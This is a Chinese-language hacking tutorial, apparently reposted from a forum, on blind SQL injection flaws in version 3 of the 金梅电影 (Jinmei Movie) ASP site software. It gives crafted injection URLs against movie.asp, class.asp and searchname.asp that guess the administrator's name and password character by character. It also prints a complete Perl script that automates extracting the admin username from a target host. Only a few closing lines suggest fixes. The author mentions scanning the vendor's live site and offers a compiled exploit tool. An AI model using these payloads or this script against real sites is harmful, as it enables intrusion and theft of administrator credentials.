涉及版本,金梅电影第三版
初学SQL注入,高手不要见笑,只写一此比较简单的注入。金梅电影实在是漏洞百出!先来看movie.asp
来这一段:articleid=request("id")
set rs=server.createobject("adodb.recordset")
sql="update learning set hits=hits+1 where articleID="&articleid
rs.open sql,conn,1,3
sql="select * from learning where articleid="&articleid
rs.open sql,conn,1,1articleid未经任何检查便提交了,呵呵。我们可以构造如下代码:
127.0.0.1/movie.asp?id=28%20AND%201=(select%20id%20from%20
password%20where%20len(pwd)=6)
127.0.0.1/movie.asp?id=28%20AND%201=(select%20id%20from%20
password%20where%20len(name)=8)
如果下常返回页面,那么可以得到后台管理员名为8位,而密码为6位。哈哈,再来:
127.0.0.1/movie.asp?id=28%20AND%201=(select%20id%20from%20
password%20where%20mid(name,1,1)=w)
正常返回页面,证明后台管理员名的第一个字母为w,呵呵,接下来不用我说了吧。重复提交类似代码,就可以把管理员名和密码弄到手了。手工输入就太麻烦了,下面这段脚本用来测试这一漏洞:
#!/usr/bin/perl
#The s cript Crack admin for 金梅电影程序
#Code by 520world
use IO::Socket;system(cls);
$ARGC = @ARGV;
if ($ARGC < 3)
{
print "\n\n";
print "\t* The s cript Crack admin for 金梅电影程序 *\n";
print "\n\tExample: jmsql.pl 127.0.0.1 /movie.asp 53 \"\n";
print "\t jmsql.pl \n\n\n";
exit;
} $host = @ARGV[0];
$way = @ARGV[1];
$txtid = @ARGV[2];
$errinfo =@ARGV[3]||800a0bcd;
$port = 80; print "\n\t* Code by 520world QQ:20000445 *\n";
print "\n\n开始在 $host 上进行测试,请等待......\n";
for ($passlen=1;$passlen<=20;$passlen++)
{
$way1 = "?id=$txtid%20AND%201=(select%20id%20from%20password%20
where%20len(pwd)=$passlen)";&url;@res =
&connect;if ("@res" !~ /$errinfo/)
{
print "\n\t* 发现ID=1的管理员的密码长度为: $passlen 位\n";
last;
}
}for ($userlen=1;$userlen<=20;$userlen++)
{
$way1 = "?id=$txtid%20AND%201=(select%20id%20from%20password%20
where%20len(name)=$userlen)";&url;@res =
&connect;if ("@res" !~ /$errinfo/)
{
print "\n\t* 发现ID=1的管理员的用户名长度为: $userlen 位\n";
last;
}
}@dig=(0..9);
@char=(a..z);
@tchar=qw(` ~ ! + @ # $Content$nbsp;^ * \( \) _ = - { } [ ] : " ; < > ? | , . / \\);
@dic=(@dig,@char,@tchar);
@dic1=(@char,@dig,@tchar);print "\n开始尝试获取ID=1的管理员的用户名,请等待......\n";for ($userlocat=1;$userlocat<=$userlen;$userlocat++)
{
foreach $usertemp(@dic1)
{
$user=$userdic.$usertemp;$way1 = "?id=$txtid%20and%201=
(select%20id%20from%20password%20
where%20mid(name,1,$userlocat)=$user)";&url;@res =
&connect;if ("@res" !~ /$errinfo/)
{
if ($userlocat==$userlen){print "\n\n\t* 获取成功!!! ID=1的管理员名字是: $user\n";last;}
print "\n\t* ID=1的管理员名字的前 $userlocat 位为 $user";
$userdic=$userdic.$usertemp;
last;
}
}
}
print "\n\n\n\t* 测试完毕. 获取到一个用户名为$user! *\n";
print "\n\n\n";
#system(pause);
sub url
{
$req = "GET $way$way1 HTTP/1.0\n".
"Host: $host\n".
"Referer: $host\n".
"Cookie: \n\n";
}
sub connect
{
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect
to $host \n";print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}其实我是个菜鸟,这段脚本是根据wawa的动网文章改来的,还请高手不要见笑,多多指教啊。
因为是用来测试的程序,所以没有提供猜测密码的代码,还请大家不要做坏事哦!
用法:jmsql.pl <网站域名> <页面路径movie.asp> <能正常返回页面的id>再来看class.asp,
............略
if typeid="全部" then
sql="select articleid,title,hits from learning order by hits desc"
else
sql="select articleid,title,hits from learning where
typeid="&typeid&"order by hits desc"
end if
Set rst= Server.CreateObject("ADODB.Recordset")
rst.open sql,conn,1,1
if rst.eof and rst.bof then
response.write " 该栏目没有任何电影 "呵呵,又来了,typeid未经任何检测。看下面的代码:
http://127.0.0.1/class.asp?typeid=动作片%20and%201=(select%20id%20from%20password%20
where%20len(name)>6)%20and%201
正常返回页面,那么管理员的密码长度大于六了。哈哈。
不用再说了。重复类似代码,管理员名和密码又能到手了。。。。。还有/user/searchname.asp,
看代码:
<%
if request("searchuser")<>"" then
set rs=server.createobject("adodb.recordset")
sql="select userid from users where userid="&request("userid")&""
rs.open sql,conn,1,2
if rs.eof then
response.write "alert(这一“用户名称”还未被注册你可以使用!);window.close();"
response.end
else
response.write "alert(这一“用户名称”已被占用,请得新输入!);history.back();"
response.end
end if
rs.close
又是未经任何检查。
我们先注册一个用户,比如jjhhh.
下面打开searchname.asp,在检查用户名的输入框中输入如下代码:
jjhhh and 1=(select id from password where len(name)=6) and 1
提交查询,返回“用户名已被注册,请得新查询”(晕,金梅字都打错了!!!!)
OK,得到管理员的用户名为六位,,呵呵。
再来,
jjhhh and 1=(select id from password where mid(name,1,1)=w) and 1
返回用户名已被注册,哈哈,管理员ID第一个字母是w!
..........................
关于这个页面的注入我也写了个脚本,且已编译成exe,有兴趣的朋友可以和我要。
金梅电影中,诸如此类的漏洞好象还有不少,我这个菜鸟就不再献丑了。希望这篇文章能够抛砖引玉。
也希望金梅能尽快完善程序,金梅用的人很多,商业站也有不少,不要再有洞了。
那个movie.asp中的洞,我看一个星期前已经有人发布了,但是我昨天扫金梅官网,发现他还没有堵这个注入。而仅仅把自己password表名修改了事。其实要堵这些洞,个人觉得并不是太难,只要写的时候多注意提交的检查。比如过滤掉提交中的空格和‘还有=以及()。
再不然就是限制提交的字符数。终极做法可以用md5加密后台密码,别人拿到密码也是白费。
文章转载地址:http://www.cnpaf.net/Class/hack/05121820345227180563.htm